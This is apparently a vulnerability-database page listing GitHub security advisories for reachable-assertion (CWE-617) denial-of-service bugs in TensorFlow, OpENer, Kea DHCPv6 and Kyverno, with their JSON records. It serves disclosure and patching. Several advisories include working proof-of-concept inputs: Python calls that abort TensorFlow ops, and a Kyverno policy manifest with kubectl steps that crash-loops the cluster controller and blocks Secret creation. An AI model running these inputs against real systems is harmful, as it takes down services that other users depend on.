CWE-617
AllowedReachable Assertion
Abstraction: Base · Status: Draft
The product contains an assert() or similar statement that can be triggered by an attacker, which leads to an application exit or other behavior that is more severe than necessary.
989 vulnerabilities reference this CWE, most recent first.
GHSA-FHFC-2Q7X-929F
Vulnerability from github – Published: 2022-09-16 22:11 – Updated: 2022-09-19 19:13Impact
When CollectiveGather receives an scalar input input, it gives a CHECK fails that can be used to trigger a denial of service attack.
import tensorflow as tf
arg_0=1
arg_1=1
arg_2=1
arg_3=1
arg_4=(3, 3,3)
arg_5='auto'
arg_6=0
arg_7=''
tf.raw_ops.CollectiveGather(input=arg_0, group_size=arg_1, group_key=arg_2,
instance_key=arg_3, shape=arg_4,
communication_hint=arg_5, timeout_seconds=arg_6, name=arg_7)
Patches
We have patched the issue in GitHub commit c1f491817dec39a26be3c574e86a88c30f3c4770.
The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
For more information
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
Attribution
This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.7.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.8.0"
},
{
"fixed": "2.8.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.9.0"
},
{
"fixed": "2.9.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.7.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.8.0"
},
{
"fixed": "2.8.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.9.0"
},
{
"fixed": "2.9.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.7.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.8.0"
},
{
"fixed": "2.8.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.9.0"
},
{
"fixed": "2.9.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-35994"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": true,
"github_reviewed_at": "2022-09-16T22:11:58Z",
"nvd_published_at": "2022-09-16T23:15:00Z",
"severity": "MODERATE"
},
"details": "### Impact\nWhen `CollectiveGather` receives an scalar input `input`, it gives a `CHECK` fails that can be used to trigger a denial of service attack.\n```python\nimport tensorflow as tf\narg_0=1\narg_1=1\narg_2=1\narg_3=1\narg_4=(3, 3,3)\narg_5=\u0027auto\u0027\narg_6=0\narg_7=\u0027\u0027\ntf.raw_ops.CollectiveGather(input=arg_0, group_size=arg_1, group_key=arg_2,\n instance_key=arg_3, shape=arg_4,\n communication_hint=arg_5, timeout_seconds=arg_6, name=arg_7)\n```\n\n### Patches\nWe have patched the issue in GitHub commit [c1f491817dec39a26be3c574e86a88c30f3c4770](https://github.com/tensorflow/tensorflow/commit/c1f491817dec39a26be3c574e86a88c30f3c4770).\n\nThe fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by \u5218\u529b\u6e90, Information System \u0026 Security and Countermeasures Experiments Center, Beijing Institute of Technology.\n",
"id": "GHSA-fhfc-2q7x-929f",
"modified": "2022-09-19T19:13:10Z",
"published": "2022-09-16T22:11:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-fhfc-2q7x-929f"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-35994"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/commit/c1f491817dec39a26be3c574e86a88c30f3c4770"
},
{
"type": "PACKAGE",
"url": "https://github.com/tensorflow/tensorflow"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.10.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "TensorFlow vulnerable to `CHECK` fail in `CollectiveGather`"
}
GHSA-FHPR-42XJ-PHJ9
Vulnerability from github – Published: 2022-05-13 00:00 – Updated: 2022-05-24 00:01A specifically crafted packet sent by an attacker to EIPStackGroup OpENer EtherNet/IP commits and versions prior to Feb 10, 2021 may result in a denial-of-service condition.
{
"affected": [],
"aliases": [
"CVE-2021-27498"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-05-12T20:15:00Z",
"severity": "HIGH"
},
"details": "A specifically crafted packet sent by an attacker to EIPStackGroup OpENer EtherNet/IP commits and versions prior to Feb 10, 2021 may result in a denial-of-service condition.",
"id": "GHSA-fhpr-42xj-phj9",
"modified": "2022-05-24T00:01:43Z",
"published": "2022-05-13T00:00:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27498"
},
{
"type": "WEB",
"url": "https://github.com/EIPStackGroup/OpENer"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-21-105-02"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FPHQ-GW9M-GHRV
Vulnerability from github – Published: 2021-05-21 14:23 – Updated: 2024-10-31 20:38Impact
An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.CTCGreedyDecoder:
import tensorflow as tf
inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32)
sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32)
merge_repeated = False
tf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated)
This is because the implementation has a CHECK_LT inserted to validate some invariants. When this condition is false, the program aborts, instead of returning a valid error to the user. This abnormal termination can be weaponized in denial of service attacks.
Patches
We have patched the issue in GitHub commit ea3b43e98c32c97b35d52b4c66f9107452ca8fb2.
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
For more information
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.2.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.3.0"
},
{
"fixed": "2.3.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.4.0"
},
{
"fixed": "2.4.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.2.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.3.0"
},
{
"fixed": "2.3.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.4.0"
},
{
"fixed": "2.4.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.2.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.3.0"
},
{
"fixed": "2.3.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.4.0"
},
{
"fixed": "2.4.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-29543"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": true,
"github_reviewed_at": "2021-05-18T21:52:51Z",
"nvd_published_at": "2021-05-14T20:15:00Z",
"severity": "LOW"
},
"details": "### Impact\nAn attacker can trigger a denial of service via a `CHECK`-fail in `tf.raw_ops.CTCGreedyDecoder`:\n\n```python\nimport tensorflow as tf\n\ninputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32)\nsequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32)\nmerge_repeated = False\n\ntf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated)\n```\n \nThis is because the [implementation](https://github.com/tensorflow/tensorflow/blob/1615440b17b364b875eb06f43d087381f1460a65/tensorflow/core/kernels/ctc_decoder_ops.cc#L37-L50) has a `CHECK_LT` inserted to validate some invariants. When this condition is false, the program aborts, instead of returning a valid error to the user. This abnormal termination can be weaponized in denial of service attacks.\n\n### Patches \nWe have patched the issue in GitHub commit [ea3b43e98c32c97b35d52b4c66f9107452ca8fb2](https://github.com/tensorflow/tensorflow/commit/ea3b43e98c32c97b35d52b4c66f9107452ca8fb2).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n \n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. \n \n### Attribution\nThis vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.",
"id": "GHSA-fphq-gw9m-ghrv",
"modified": "2024-10-31T20:38:49Z",
"published": "2021-05-21T14:23:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-fphq-gw9m-ghrv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29543"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/commit/ea3b43e98c32c97b35d52b4c66f9107452ca8fb2"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-471.yaml"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-669.yaml"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-180.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/tensorflow/tensorflow"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "CHECK-fail in `CTCGreedyDecoder`"
}
GHSA-FPJQ-C37H-CQCV
Vulnerability from github – Published: 2026-04-24 20:40 – Updated: 2026-04-24 20:40Summary
An unchecked type assertion in the forEach mutation handler allows any user with permission to create a Policy or ClusterPolicy to crash the cluster-wide background controller into a persistent CrashLoopBackOff. The same bug also causes the admission controller to drop connections and block all matching resource operations. The crash loop persists until the policy is deleted. The vulnerability is confined to the legacy engine, and CEL-based policies are unaffected.
Details
In pkg/engine/mutate/mutation.go, the ForEach function performs a bare type assertion on a map value that can be nil:
patcher := NewPatcher(fe["patchStrategicMerge"], fe["patchesJson6902"].(string))
When a forEach rule uses a patchesJson6902 field containing a variable substitution (e.g., {{ element.nonexistent }}) that resolves to nil at runtime, the type assertion .(string) on a nil interface{} triggers an unrecoverable Go panic:
panic: interface conversion: interface {} is nil, not string
When a mutateExisting rule triggers, the admission controller creates an UpdateRequest resource that the background controller processes asynchronously. This resource survives controller restarts, re-triggering the panic on every restart until the policy or UpdateRequest is deleted.
The background controller processes mutateExisting rules in worker goroutines where k8s.io/apimachinery/pkg/util/runtime.HandleCrash catches panics but re-panics by default, killing the process. The admission controller survives because Go's net/http server absorbs panics in handler goroutines via defer recover(), though the connection is dropped.
The vulnerable code was introduced in #10702. Kyverno versions v1.13.0 to v1.17.1 are affected.
PoC
Apply the following manifest:
# --- PoC A: Namespaced Policy crashes the background controller ---
apiVersion: kyverno.io/v1
kind: Policy
metadata:
name: poc-background-crash
namespace: default
spec:
mutateExistingOnPolicyUpdate: true
rules:
- name: crash-foreach-nil
match:
any:
- resources:
kinds:
- ConfigMap
mutate:
targets:
- apiVersion: v1
kind: ConfigMap
name: poc-target
namespace: default
foreach:
- list: "target.data | keys(@)"
patchesJson6902: "{{ element.nonexistent }}"
---
apiVersion: v1
kind: ConfigMap
metadata:
name: poc-target
namespace: default
data:
key1: value1
---
# This ConfigMap creation triggers the mutateExisting rule via UpdateRequest
apiVersion: v1
kind: ConfigMap
metadata:
name: poc-trigger
namespace: default
data:
trigger: "true"
---
# --- PoC B: ClusterPolicy panics the admission controller (connection drop) ---
# Effect: all Secret create/update operations are blocked cluster-wide
# The admission controller does not crash (net/http recovers), but every
# matching request gets EOF -> webhook failure -> denied
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: poc-admission-panic
spec:
rules:
- name: panic-foreach-nil
match:
any:
- resources:
kinds:
- Secret
mutate:
foreach:
- list: "request.object.data | keys(@)"
patchesJson6902: "{{ element.nonexistent }}"
Verify:
# After ~5 seconds, background controller is in CrashLoopBackOff:
kubectl get pods -n kyverno -l app.kubernetes.io/component=background-controller
# Admission panic — all Secret operations fail with EOF:
kubectl create secret generic test-secret --from-literal=key=value
# Error: failed calling webhook "mutate.kyverno.svc-fail": ... EOF
Admission controller logs:
http: panic serving 10.244.0.1:64359: interface conversion: interface {} is nil, not string
goroutine 1914 [running]:
net/http.(*conn).serve.func1()
net/http/server.go:1943 +0xb4
panic({0x3947fc0?, 0x40023e3890?})
runtime/panic.go:783 +0x120
github.com/kyverno/kyverno/pkg/engine/mutate.ForEach({0x394e240?, 0x0?}, {{0x4001c3f300, 0x1d}, 0x0, {0x0, 0x0, 0x0}, 0x0, 0x0, ...}, ...)
github.com/kyverno/kyverno/pkg/engine/mutate/mutation.go:81 +0x3e0
github.com/kyverno/kyverno/pkg/engine/handlers/mutation.(*forEachMutator).mutateElements(0x4002609410, {0x4cd78d8, 0x40023b1d10}, {{0x4001c3f300, 0x1d}, 0x0, {0x0, 0x0, 0x0}, 0x0, ...}, ...)
github.com/kyverno/kyverno/pkg/engine/handlers/mutation/common.go:126 +0x4e8
github.com/kyverno/kyverno/pkg/engine/handlers/mutation.(*forEachMutator).mutateForEach(0x4002609410, {0x4cd78d8, 0x40023b1d10})
...
Impact
Persistent denial of service of cluster-wide Kyverno controllers. Policy is a namespaced resource whose creation can be delegated to namespace users via standard Role/RoleBinding, without granting any cluster-level permissions. Such a user can:
- Crash the background controller into a persistent CrashLoopBackOff, halting all background processing (generate rules, mutateExisting rules, cleanup) across all namespaces in the cluster, not just their own.
- Block admission operations for matched resource kinds within their namespace via the admission controller webhook panic path. With a
ClusterPolicy(requiring cluster-level RBAC), the admission block extends cluster-wide.
The crash loop is self-sustaining because the poisoned UpdateRequest remains in the queue and re-triggers the panic on every controller restart.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/kyverno/kyverno"
},
"ranges": [
{
"events": [
{
"introduced": "1.13.0"
},
{
"fixed": "1.16.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/kyverno/kyverno"
},
"ranges": [
{
"events": [
{
"introduced": "1.17.0-rc.1"
},
{
"fixed": "1.17.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41485"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-24T20:40:39Z",
"nvd_published_at": "2026-04-24T04:16:21Z",
"severity": "HIGH"
},
"details": "### Summary\n\nAn unchecked type assertion in the `forEach` mutation handler allows any user with permission to create a `Policy` or `ClusterPolicy` to crash the cluster-wide background controller into a persistent CrashLoopBackOff. The same bug also causes the admission controller to drop connections and block all matching resource operations. The crash loop persists until the policy is deleted. The vulnerability is confined to the legacy engine, and CEL-based policies are unaffected.\n\n### Details\n\nIn `pkg/engine/mutate/mutation.go`, the `ForEach` function performs a bare type assertion on a map value that can be nil:\n\n```go\npatcher := NewPatcher(fe[\"patchStrategicMerge\"], fe[\"patchesJson6902\"].(string))\n```\n\nWhen a `forEach` rule uses a `patchesJson6902` field containing a variable substitution (e.g., `{{ element.nonexistent }}`) that resolves to `nil` at runtime, the type assertion `.(string)` on a nil `interface{}` triggers an unrecoverable Go panic:\n\n```\npanic: interface conversion: interface {} is nil, not string\n```\n\nWhen a `mutateExisting` rule triggers, the admission controller creates an `UpdateRequest` resource that the background controller processes asynchronously. This resource survives controller restarts, re-triggering the panic on every restart until the policy or `UpdateRequest` is deleted.\n\nThe background controller processes `mutateExisting` rules in worker goroutines where `k8s.io/apimachinery/pkg/util/runtime.HandleCrash` catches panics but re-panics by default, killing the process. The admission controller survives because Go\u0027s `net/http` server absorbs panics in handler goroutines via `defer recover()`, though the connection is dropped.\n\nThe vulnerable code was introduced in #10702. Kyverno versions v1.13.0 to v1.17.1 are affected.\n\n### PoC\n\nApply the following manifest:\n\n```yaml\n# --- PoC A: Namespaced Policy crashes the background controller ---\napiVersion: kyverno.io/v1\nkind: Policy\nmetadata:\n name: poc-background-crash\n namespace: default\nspec:\n mutateExistingOnPolicyUpdate: true\n rules:\n - name: crash-foreach-nil\n match:\n any:\n - resources:\n kinds:\n - ConfigMap\n mutate:\n targets:\n - apiVersion: v1\n kind: ConfigMap\n name: poc-target\n namespace: default\n foreach:\n - list: \"target.data | keys(@)\"\n patchesJson6902: \"{{ element.nonexistent }}\"\n---\napiVersion: v1\nkind: ConfigMap\nmetadata:\n name: poc-target\n namespace: default\ndata:\n key1: value1\n---\n# This ConfigMap creation triggers the mutateExisting rule via UpdateRequest\napiVersion: v1\nkind: ConfigMap\nmetadata:\n name: poc-trigger\n namespace: default\ndata:\n trigger: \"true\"\n---\n# --- PoC B: ClusterPolicy panics the admission controller (connection drop) ---\n# Effect: all Secret create/update operations are blocked cluster-wide\n# The admission controller does not crash (net/http recovers), but every\n# matching request gets EOF -\u003e webhook failure -\u003e denied\napiVersion: kyverno.io/v1\nkind: ClusterPolicy\nmetadata:\n name: poc-admission-panic\nspec:\n rules:\n - name: panic-foreach-nil\n match:\n any:\n - resources:\n kinds:\n - Secret\n mutate:\n foreach:\n - list: \"request.object.data | keys(@)\"\n patchesJson6902: \"{{ element.nonexistent }}\"\n```\n\nVerify:\n\n```bash\n# After ~5 seconds, background controller is in CrashLoopBackOff:\nkubectl get pods -n kyverno -l app.kubernetes.io/component=background-controller\n\n# Admission panic \u2014 all Secret operations fail with EOF:\nkubectl create secret generic test-secret --from-literal=key=value\n# Error: failed calling webhook \"mutate.kyverno.svc-fail\": ... EOF\n```\n\nAdmission controller logs:\n\n```\nhttp: panic serving 10.244.0.1:64359: interface conversion: interface {} is nil, not string\ngoroutine 1914 [running]:\nnet/http.(*conn).serve.func1()\n net/http/server.go:1943 +0xb4\npanic({0x3947fc0?, 0x40023e3890?})\n runtime/panic.go:783 +0x120\ngithub.com/kyverno/kyverno/pkg/engine/mutate.ForEach({0x394e240?, 0x0?}, {{0x4001c3f300, 0x1d}, 0x0, {0x0, 0x0, 0x0}, 0x0, 0x0, ...}, ...)\n github.com/kyverno/kyverno/pkg/engine/mutate/mutation.go:81 +0x3e0\ngithub.com/kyverno/kyverno/pkg/engine/handlers/mutation.(*forEachMutator).mutateElements(0x4002609410, {0x4cd78d8, 0x40023b1d10}, {{0x4001c3f300, 0x1d}, 0x0, {0x0, 0x0, 0x0}, 0x0, ...}, ...)\n github.com/kyverno/kyverno/pkg/engine/handlers/mutation/common.go:126 +0x4e8\ngithub.com/kyverno/kyverno/pkg/engine/handlers/mutation.(*forEachMutator).mutateForEach(0x4002609410, {0x4cd78d8, 0x40023b1d10})\n...\n```\n\n### Impact\n\nPersistent denial of service of cluster-wide Kyverno controllers. `Policy` is a namespaced resource whose creation can be delegated to namespace users via standard Role/RoleBinding, without granting any cluster-level permissions. Such a user can:\n\n1. Crash the background controller into a persistent CrashLoopBackOff, halting all background processing (generate rules, mutateExisting rules, cleanup) across all namespaces in the cluster, not just their own.\n2. Block admission operations for matched resource kinds within their namespace via the admission controller webhook panic path. With a `ClusterPolicy` (requiring cluster-level RBAC), the admission block extends cluster-wide.\n\nThe crash loop is self-sustaining because the poisoned `UpdateRequest` remains in the queue and re-triggers the panic on every controller restart.",
"id": "GHSA-fpjq-c37h-cqcv",
"modified": "2026-04-24T20:40:39Z",
"published": "2026-04-24T20:40:39Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/kyverno/kyverno/security/advisories/GHSA-fpjq-c37h-cqcv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41485"
},
{
"type": "WEB",
"url": "https://github.com/kyverno/kyverno/commit/76c8fdbe87328722e099e1fd44c3f21c9f7809cb"
},
{
"type": "WEB",
"url": "https://github.com/kyverno/kyverno/commit/80e728c2283a0c65e5adb02d8a907106e6ebe7e3"
},
{
"type": "PACKAGE",
"url": "https://github.com/kyverno/kyverno"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Kyverno Controller Denial of Service via forEach Mutation Panic"
}
GHSA-FQ2X-J295-RQ5G
Vulnerability from github – Published: 2022-05-24 16:59 – Updated: 2024-04-04 02:30A packet containing a malformed DUID can cause the Kea DHCPv6 server process (kea-dhcp6) to exit due to an assertion failure. Versions affected: 1.4.0 to 1.5.0, 1.6.0-beta1, and 1.6.0-beta2.
{
"affected": [],
"aliases": [
"CVE-2019-6472"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-10-16T18:15:00Z",
"severity": "MODERATE"
},
"details": "A packet containing a malformed DUID can cause the Kea DHCPv6 server process (kea-dhcp6) to exit due to an assertion failure. Versions affected: 1.4.0 to 1.5.0, 1.6.0-beta1, and 1.6.0-beta2.",
"id": "GHSA-fq2x-j295-rq5g",
"modified": "2024-04-04T02:30:27Z",
"published": "2022-05-24T16:59:13Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-6472"
},
{
"type": "WEB",
"url": "https://kb.isc.org/docs/cve-2019-6472"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FQ86-3F29-PX2C
Vulnerability from github – Published: 2022-02-07 22:01 – Updated: 2024-11-07 22:27Impact
The Grappler optimizer in TensorFlow can be used to cause a denial of service by altering a SavedModel such that IsSimplifiableReshape would trigger CHECK failures.
Patches
We have patched the issue in GitHub commits ebc1a2ffe5a7573d905e99bd0ee3568ee07c12c1, 1fb27733f943295d874417630edd3b38b34ce082, and 240655511cd3e701155f944a972db71b6c0b1bb6.
The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.
For more information
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.6.0"
},
{
"fixed": "2.6.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.7.0"
},
{
"fixed": "2.7.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"2.7.0"
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.6.0"
},
{
"fixed": "2.6.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.7.0"
},
{
"fixed": "2.7.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"2.7.0"
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.6.0"
},
{
"fixed": "2.6.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.7.0"
},
{
"fixed": "2.7.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"2.7.0"
]
}
],
"aliases": [
"CVE-2022-23581"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": true,
"github_reviewed_at": "2022-02-04T19:54:48Z",
"nvd_published_at": "2022-02-04T23:15:00Z",
"severity": "MODERATE"
},
"details": "### Impact\nThe Grappler optimizer in TensorFlow can be used to cause a denial of service by altering a `SavedModel` such that [`IsSimplifiableReshape`](https://github.com/tensorflow/tensorflow/blob/a1320ec1eac186da1d03f033109191f715b2b130/tensorflow/core/grappler/optimizers/constant_folding.cc#L1687-L1742) would trigger `CHECK` failures.\n\n### Patches\nWe have patched the issue in GitHub commits [ebc1a2ffe5a7573d905e99bd0ee3568ee07c12c1](https://github.com/tensorflow/tensorflow/commit/ebc1a2ffe5a7573d905e99bd0ee3568ee07c12c1), [1fb27733f943295d874417630edd3b38b34ce082](https://github.com/tensorflow/tensorflow/commit/1fb27733f943295d874417630edd3b38b34ce082), and [240655511cd3e701155f944a972db71b6c0b1bb6](https://github.com/tensorflow/tensorflow/commit/240655511cd3e701155f944a972db71b6c0b1bb6).\n\nThe fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.",
"id": "GHSA-fq86-3f29-px2c",
"modified": "2024-11-07T22:27:29Z",
"published": "2022-02-07T22:01:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-fq86-3f29-px2c"
},
{
